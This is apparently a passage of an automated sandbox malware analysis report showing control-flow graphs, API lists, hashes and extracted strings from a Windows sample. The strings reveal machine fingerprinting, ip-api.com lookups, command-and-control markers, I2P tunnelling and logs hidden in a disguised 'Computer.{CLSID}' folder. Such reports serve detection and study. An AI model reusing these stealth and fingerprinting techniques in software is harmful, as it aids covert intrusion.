                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                                                                  • String ID: %$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$service$sys_init
                                                                                                                  • API String ID: 3828489143-3798070276
                                                                                                                  • Opcode ID: 080eab42d11e341088ee9c0150e6ca92e028b00ecaa64304e25d3df71537468d
                                                                                                                  • Instruction ID: 4f82021828cffb708c6e4c950f8a573decc57dacb1fb0b90a73aac2de49eaa9c
                                                                                                                  • Opcode Fuzzy Hash: 080eab42d11e341088ee9c0150e6ca92e028b00ecaa64304e25d3df71537468d
                                                                                                                  • Instruction Fuzzy Hash: 3AD133B1E0C69285FB20EF16A450BBDA760AB407B5F950133CD4E577A4DEAEF884C361

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1035 7ffe1a52bc77-7ffe1a52bc97 1036 7ffe1a52bd05-7ffe1a52bd0d 1035->1036 1037 7ffe1a52bc99-7ffe1a52bca1 1035->1037 1038 7ffe1a52bd20-7ffe1a52bd36 call 7ffe1a52689b 1036->1038 1039 7ffe1a52bd0f-7ffe1a52bd14 1036->1039 1040 7ffe1a52bcb0-7ffe1a52bcb8 1037->1040 1041 7ffe1a52bca3-7ffe1a52bcaa 1037->1041 1048 7ffe1a52c38c-7ffe1a52c39d 1038->1048 1042 7ffe1a52bd16-7ffe1a52bd1b 1039->1042 1043 7ffe1a52bd3b-7ffe1a52bd40 1039->1043 1046 7ffe1a52bcbe-7ffe1a52bcc6 1040->1046 1047 7ffe1a52c387 1040->1047 1041->1040 1045 7ffe1a52c0b3-7ffe1a52c0cd call 7ffe1a52689b 1041->1045 1042->1048 1051 7ffe1a52bd6f-7ffe1a52beba call 7ffe1a5222f5 call 7ffe1a527400 call 7ffe1a525ec9 1043->1051 1052 7ffe1a52bd42-7ffe1a52bd48 1043->1052 1045->1040 1063 7ffe1a52c0d3-7ffe1a52c0db 1045->1063 1053 7ffe1a52bcc8-7ffe1a52bccf 1046->1053 1054 7ffe1a52bcdb-7ffe1a52bce6 1046->1054 1047->1048 1088 7ffe1a52bec0-7ffe1a52beee call 7ffe1a52d3f2 1051->1088 1089 7ffe1a52c039-7ffe1a52c06e call 7ffe1a523805 1051->1089 1052->1051 1059 7ffe1a52bd4a-7ffe1a52bd6a 1052->1059 1053->1054 1055 7ffe1a52bcd1-7ffe1a52bcd9 1053->1055 1056 7ffe1a52c39e-7ffe1a52c3a3 1054->1056 1057 7ffe1a52bcec-7ffe1a52bcf5 1054->1057 1055->1054 1055->1057 1056->1048 1061 7ffe1a52c22d-7ffe1a52c253 1057->1061 1062 7ffe1a52bcfb-7ffe1a52bd00 1057->1062 1059->1048 1066 7ffe1a52c3a5-7ffe1a52c3aa 1061->1066 1067 7ffe1a52c259-7ffe1a52c260 1061->1067 1062->1048 1068 7ffe1a52c0e1-7ffe1a52c0f2 1063->1068 1069 7ffe1a52c167-7ffe1a52c182 call 7ffe1a52689b call 7ffe1a52b910 1063->1069 1066->1048 1072 7ffe1a52c26f-7ffe1a52c295 GetProcessHeap HeapAlloc 1067->1072 1073 7ffe1a52c262-7ffe1a52c26c 1067->1073 1074 7ffe1a52c0f4-7ffe1a52c10b 1068->1074 1075 7ffe1a52c10d-7ffe1a52c116 1068->1075 1069->1048 1078 7ffe1a52c309-7ffe1a52c324 call 7ffe1a5277a2 1072->1078 1079 7ffe1a52c297-7ffe1a52c2d9 memcpy call 7ffe1a529100 1072->1079 1073->1072 1074->1069 1074->1075 1075->1069 1080 7ffe1a52c118-7ffe1a52c120 1075->1080 1078->1048 1099 7ffe1a52c2df 1079->1099 1100 7ffe1a52c378-7ffe1a52c37b 1079->1100 1085 7ffe1a52c135-7ffe1a52c140 1080->1085 1086 7ffe1a52c122-7ffe1a52c129 1080->1086 1093 7ffe1a52c142-7ffe1a52c14a 1085->1093 1094 7ffe1a52c187 call 7ffe1a52b9f4 1085->1094 1086->1085 1092 7ffe1a52c12b-7ffe1a52c133 1086->1092 1113 7ffe1a52bef0-7ffe1a52bef8 1088->1113 1114 7ffe1a52befe-7ffe1a52bf0a call 7ffe1a5268e2 1088->1114 1089->1088 1109 7ffe1a52c074-7ffe1a52c087 call 7ffe1a52ea90 1089->1109 1092->1085 1092->1093 1095 7ffe1a52c196-7ffe1a52c1b0 call 7ffe1a52689b 1093->1095 1096 7ffe1a52c14c-7ffe1a52c162 call 7ffe1a52689b 1093->1096 1105 7ffe1a52c18c-7ffe1a52c191 1094->1105 1122 7ffe1a52c1b2-7ffe1a52c1b7 1095->1122 1123 7ffe1a52c1bc-7ffe1a52c228 call 7ffe1a5222f5 call 7ffe1a52689b call 7ffe1a5261a2 1095->1123 1096->1048 1107 7ffe1a52c2e4-7ffe1a52c2e7 1099->1107 1103 7ffe1a52c33a-7ffe1a52c33c 1100->1103 1111 7ffe1a52c33e-7ffe1a52c346 1103->1111 1112 7ffe1a52c34d-7ffe1a52c35c call 7ffe1a52917d 1103->1112 1105->1048 1107->1048 1116 7ffe1a52c2ed-7ffe1a52c304 GetProcessHeap HeapFree 1107->1116 1109->1088 1111->1112 1118 7ffe1a52c348-7ffe1a52c34b 1111->1118 1112->1099 1133 7ffe1a52c35e-7ffe1a52c36c call 7ffe1a52bc0e 1112->1133 1113->1114 1119 7ffe1a52c08c-7ffe1a52c0ae memcpy 1113->1119 1131 7ffe1a52bf29-7ffe1a52bf3f call 7ffe1a526a68 1114->1131 1132 7ffe1a52bf0c-7ffe1a52bf21 1114->1132 1116->1048 1118->1112 1126 7ffe1a52c326-7ffe1a52c336 call 7ffe1a5291ee 1118->1126 1119->1114 1122->1048 1123->1048 1126->1103 1142 7ffe1a52bf41-7ffe1a52bf5d 1131->1142 1143 7ffe1a52bf64-7ffe1a52bfab call 7ffe1a529370 1131->1143 1132->1131 1144 7ffe1a52c36e-7ffe1a52c373 1133->1144 1145 7ffe1a52c37d-7ffe1a52c382 1133->1145 1142->1143 1149 7ffe1a52bfdf-7ffe1a52bfe7 1143->1149 1150 7ffe1a52bfad-7ffe1a52bfb5 1143->1150 1144->1107 1145->1107 1152 7ffe1a52c000-7ffe1a52c034 call 7ffe1a5261a2 1149->1152 1153 7ffe1a52bfe9-7ffe1a52bffa GetProcessHeap HeapFree 1149->1153 1150->1149 1151 7ffe1a52bfb7-7ffe1a52bfd2 call 7ffe1a521290 1150->1151 1151->1149 1158 7ffe1a52bfd4-7ffe1a52bfd8 1151->1158 1152->1048 1153->1152 1158->1149
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $--TSCB--$-ILCCNC-$-ILCCNC-$-ILCCNC-$-VRSCNC-$/line?fields=query$AKAK$AKAK$KCIT$Referer$SYSTEM\CurrentControlSet\Services\UpdateService\Parameters$TPCR$[E] (%s) -> Memory allocation failed(size=%llu)$curl/8.4.0$ip-api.com$last-patch$mem_alloc
                                                                                                                  • API String ID: 0-4235120829
                                                                                                                  • Opcode ID: dd9b79688cd0451efef8b4d798b38d9b34a6f91578c4f62828ec16dba5e2c159
                                                                                                                  • Instruction ID: 3601005c2235065dcd9fdb2f8cf3eb4fb20d0b04ebeca761407abfa151df3a9b
                                                                                                                  • Opcode Fuzzy Hash: dd9b79688cd0451efef8b4d798b38d9b34a6f91578c4f62828ec16dba5e2c159
                                                                                                                  • Instruction Fuzzy Hash: F7124E61B0DE82C2EA608B96E4403BA63A2EF86B64F5046F7DA5D477B5DF3CE445C700

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$strcat$HandleLibraryLoadModule
                                                                                                                  • String ID: --conf=$--datadi$--reseed$.file=$C_InitI2P$C_StartI2P$Done$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$i2p$i2p$i2p.conf$i2p.su3$i2p.su3$i2p_init$libi2p.dll
                                                                                                                  • API String ID: 1893813203-492052463
                                                                                                                  • Opcode ID: aebe301ea77f47b819ae4e02351c40eef5913accd0ab7f2ddaf9c8f3282d6c25
                                                                                                                  • Instruction ID: 4d285410c5928897326b8bcee0d84f53d3508fad136099a6974ffc37d2c82845
                                                                                                                  • Opcode Fuzzy Hash: aebe301ea77f47b819ae4e02351c40eef5913accd0ab7f2ddaf9c8f3282d6c25
                                                                                                                  • Instruction Fuzzy Hash: 26719E72B0CF82D1E7259B56E4503FA6292AF96B90F4400B3DA8D4B7A9EF7CE505C740

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1250 7ffe11bdc9fc-7ffe11bdca24 InitializeCriticalSectionAndSpinCount 1251 7ffe11bdca2a-7ffe11bdca5e call 7ffe11bdb930 call 7ffe11bd466b 1250->1251 1252 7ffe11bdcb50-7ffe11bdcb71 GetLastError call 7ffe11bdc852 1250->1252 1265 7ffe11bdcb29-7ffe11bdcb41 call 7ffe11bdc852 1251->1265 1266 7ffe11bdca64-7ffe11bdca7b strlen 1251->1266 1258 7ffe11bdcb73 1252->1258 1259 7ffe11bdcb92-7ffe11bdcb98 1252->1259 1261 7ffe11bdcb79-7ffe11bdcb86 1258->1261 1262 7ffe11bdcc51-7ffe11bdcc56 1258->1262 1263 7ffe11bdcc5b 1259->1263 1264 7ffe11bdcb9e-7ffe11bdcba4 1259->1264 1261->1259 1262->1265 1273 7ffe11bdcc65-7ffe11bdcc6a 1263->1273 1267 7ffe11bdcba6-7ffe11bdcbac 1264->1267 1268 7ffe11bdcbd0-7ffe11bdcbd3 1264->1268 1286 7ffe11bdcb46-7ffe11bdcb4f 1265->1286 1269 7ffe11bdca7d-7ffe11bdca80 1266->1269 1270 7ffe11bdca93-7ffe11bdca96 1266->1270 1271 7ffe11bdcc79-7ffe11bdcc7e 1267->1271 1272 7ffe11bdcbb2-7ffe11bdcbb8 1267->1272 1274 7ffe11bdcbed-7ffe11bdcbf3 1268->1274 1275 7ffe11bdcbd5-7ffe11bdcbd8 1268->1275 1269->1270 1279 7ffe11bdca82-7ffe11bdca8f strlen 1269->1279 1280 7ffe11bdcab8-7ffe11bdcb01 strlen fopen 1270->1280 1281 7ffe11bdca98-7ffe11bdcab2 strcat strlen 1270->1281 1271->1265 1282 7ffe11bdcc83-7ffe11bdcc88 1272->1282 1283 7ffe11bdcbbe-7ffe11bdcbc4 1272->1283 1273->1265 1277 7ffe11bdcbf5-7ffe11bdcbfa 1274->1277 1278 7ffe11bdcc6f 1274->1278 1284 7ffe11bdcbda-7ffe11bdcbdd 1275->1284 1285 7ffe11bdcc47 1275->1285 1277->1265 1278->1271 1279->1270 1287 7ffe11bdcc1d-7ffe11bdcc38 call 7ffe11bdc852 1280->1287 1288 7ffe11bdcb07-7ffe11bdcb23 call 7ffe11bdc852 1280->1288 1281->1280 1282->1265 1289 7ffe11bdcbc6-7ffe11bdcbcb 1283->1289 1290 7ffe11bdcbff-7ffe11bdcc04 1283->1290 1284->1273 1291 7ffe11bdcbe3-7ffe11bdcbe8 1284->1291 1285->1262 1287->1265 1288->1265 1296 7ffe11bdcc8d-7ffe11bdcca7 call 7ffe11bdc852 1288->1296 1289->1265 1290->1265 1291->1265 1296->1286
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                                                                                  • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$rdpctl.l$~
                                                                                                                  • API String ID: 3395718042-1794035234
                                                                                                                  • Opcode ID: b6d1a52f3503f5349d273879bbcd7da010761f72ce9b35bd60bd1f6f274df763
                                                                                                                  • Instruction ID: c194ebb95a51b559b1044adebea2a1abb722d4dd36b4cd5aa0c680e3b4155128
                                                                                                                  • Opcode Fuzzy Hash: b6d1a52f3503f5349d273879bbcd7da010761f72ce9b35bd60bd1f6f274df763
                                                                                                                  • Instruction Fuzzy Hash: 60516C20E1CE47C1FF389F13A880AF95699AF04768F5430BAC90D462B2EE6DE9469341
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                                                                                  • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$dwlmgr.l$log$~
                                                                                                                  • API String ID: 3395718042-2859552336
                                                                                                                  • Opcode ID: 3d9a113357acc3577ff2ea5f3ec24565adaeee734f24cd4d0693bf15a7530403
                                                                                                                  • Instruction ID: f543fc9766d6285ad8d729b08ff36d964d6482501d87c2303b71abf7a949fd08
                                                                                                                  • Opcode Fuzzy Hash: 3d9a113357acc3577ff2ea5f3ec24565adaeee734f24cd4d0693bf15a7530403
                                                                                                                  • Instruction Fuzzy Hash: 35510750F0CF5782FA209B1BA9903FC1255AB46FA5F9860F3CB0E062B5EE6CA955C301
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                                                                                  • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$evtsrv.l$log$~
                                                                                                                  • API String ID: 3395718042-190452282
                                                                                                                  • Opcode ID: 59e782ed6a1c19385272f51f88c15abcad5e3104e4494a3cefd5bae1c37b7bce
                                                                                                                  • Instruction ID: ff256f3ac0599b582e8273e001e703b51577713c6b7cd162aa6e609e1add7309
                                                                                                                  • Opcode Fuzzy Hash: 59e782ed6a1c19385272f51f88c15abcad5e3104e4494a3cefd5bae1c37b7bce
                                                                                                                  • Instruction Fuzzy Hash: 9C512661A0CE53CAFB20DB53AC903B82352AF55774F9041F2C90E466FADEEDA9468705
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                                                                                  • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$cnccli.l$debug_init$log$~
                                                                                                                  • API String ID: 3395718042-315528054
                                                                                                                  • Opcode ID: 2310b059fd1db1d94807d4043fe70c93fc81e218b0df7df5f885e9a005487d1a
                                                                                                                  • Instruction ID: 1d05ca37283157023b45d9a7b9d14daa948afd21534003a8dcb45f2b263c31ed
                                                                                                                  • Opcode Fuzzy Hash: 2310b059fd1db1d94807d4043fe70c93fc81e218b0df7df5f885e9a005487d1a
                                                                                                                  • Instruction Fuzzy Hash: 86513951F0CE07D5FA20D793A8803B91252AF97FB4F5401F3C90E462B2EF6DAA868341

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1201 7ffe1150427c-7ffe115042a4 InitializeCriticalSectionAndSpinCount 1202 7ffe115042aa-7ffe115042de call 7ffe11502700 call 7ffe1150ce6b 1201->1202 1203 7ffe115043d0-7ffe115043f1 GetLastError call 7ffe115040d2 1201->1203 1218 7ffe115043a9-7ffe115043c1 call 7ffe115040d2 1202->1218 1219 7ffe115042e4-7ffe115042fb strlen 1202->1219 1209 7ffe115043f3 1203->1209 1210 7ffe11504412-7ffe11504418 1203->1210 1214 7ffe115043f9-7ffe11504406 1209->1214 1215 7ffe115044d1-7ffe115044d6 1209->1215 1211 7ffe115044db 1210->1211 1212 7ffe1150441e-7ffe11504424 1210->1212 1222 7ffe115044e5-7ffe115044ea 1211->1222 1216 7ffe11504426-7ffe1150442c 1212->1216 1217 7ffe11504450-7ffe11504453 1212->1217 1214->1210 1215->1218 1220 7ffe115044f9-7ffe115044fe 1216->1220 1221 7ffe11504432-7ffe11504438 1216->1221 1223 7ffe1150446d-7ffe11504473 1217->1223 1224 7ffe11504455-7ffe11504458 1217->1224 1236 7ffe115043c6-7ffe115043cf 1218->1236 1226 7ffe115042fd-7ffe11504300 1219->1226 1227 7ffe11504313-7ffe11504316 1219->1227 1220->1218 1230 7ffe11504503-7ffe11504508 1221->1230 1231 7ffe1150443e-7ffe11504444 1221->1231 1222->1218 1234 7ffe11504475-7ffe1150447a 1223->1234 1235 7ffe115044ef 1223->1235 1232 7ffe1150445a-7ffe1150445d 1224->1232 1233 7ffe115044c7 1224->1233 1226->1227 1237 7ffe11504302-7ffe1150430f strlen 1226->1237 1228 7ffe11504338-7ffe11504381 strlen fopen 1227->1228 1229 7ffe11504318-7ffe11504332 strcat strlen 1227->1229 1238 7ffe1150449d-7ffe115044b8 call 7ffe115040d2 1228->1238 1239 7ffe11504387-7ffe115043a3 call 7ffe115040d2 1228->1239 1229->1228 1230->1218 1240 7ffe11504446-7ffe1150444b 1231->1240 1241 7ffe1150447f-7ffe11504484 1231->1241 1232->1222 1242 7ffe11504463-7ffe11504468 1232->1242 1233->1215 1234->1218 1235->1220 1237->1227 1238->1218 1239->1218 1247 7ffe1150450d-7ffe11504527 call 7ffe115040d2 1239->1247 1240->1218 1241->1218 1242->1218 1247->1236
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                                                                                  • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$samctl.l$~
                                                                                                                  • API String ID: 3395718042-1297835036
                                                                                                                  • Opcode ID: f4f29f3b456042e41e7448ec425dd3a81f0c8f3fc0a42b3d709108ae0aa0be7e
                                                                                                                  • Instruction ID: 118318526d58c2c7f372fc1aa84d8bd3a81d447b2e7d515c5439786c41bb3698
                                                                                                                  • Opcode Fuzzy Hash: f4f29f3b456042e41e7448ec425dd3a81f0c8f3fc0a42b3d709108ae0aa0be7e
                                                                                                                  • Instruction Fuzzy Hash: 5A516050E5CF0385FB21A783A4803BC1B5EAF457B8F9410BAC90E5A6B6DF6DB895C301

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1299 7ffe11ec9f6c-7ffe11ec9f94 InitializeCriticalSectionAndSpinCount 1300 7ffe11ec9f9a-7ffe11ec9fce call 7ffe11ec4ac0 call 7ffe11ec89db 1299->1300 1301 7ffe11eca0c0-7ffe11eca0e1 GetLastError call 7ffe11ec9dc2 1299->1301 1316 7ffe11eca099-7ffe11eca0b1 call 7ffe11ec9dc2 1300->1316 1317 7ffe11ec9fd4-7ffe11ec9feb strlen 1300->1317 1307 7ffe11eca102-7ffe11eca108 1301->1307 1308 7ffe11eca0e3 1301->1308 1309 7ffe11eca1cb 1307->1309 1310 7ffe11eca10e-7ffe11eca114 1307->1310 1312 7ffe11eca0e9-7ffe11eca0f6 1308->1312 1313 7ffe11eca1c1-7ffe11eca1c6 1308->1313 1320 7ffe11eca1d5-7ffe11eca1da 1309->1320 1314 7ffe11eca116-7ffe11eca11c 1310->1314 1315 7ffe11eca140-7ffe11eca143 1310->1315 1312->1307 1313->1316 1318 7ffe11eca1e9-7ffe11eca1ee 1314->1318 1319 7ffe11eca122-7ffe11eca128 1314->1319 1321 7ffe11eca15d-7ffe11eca163 1315->1321 1322 7ffe11eca145-7ffe11eca148 1315->1322 1332 7ffe11eca0b6-7ffe11eca0bf 1316->1332 1324 7ffe11ec9fed-7ffe11ec9ff0 1317->1324 1325 7ffe11eca003-7ffe11eca006 1317->1325 1318->1316 1328 7ffe11eca1f3-7ffe11eca1f8 1319->1328 1329 7ffe11eca12e-7ffe11eca134 1319->1329 1320->1316 1333 7ffe11eca165-7ffe11eca16a 1321->1333 1334 7ffe11eca1df 1321->1334 1330 7ffe11eca14a-7ffe11eca14d 1322->1330 1331 7ffe11eca1b7 1322->1331 1324->1325 1335 7ffe11ec9ff2-7ffe11ec9fff strlen 1324->1335 1326 7ffe11eca028-7ffe11eca071 strlen fopen 1325->1326 1327 7ffe11eca008-7ffe11eca022 strcat strlen 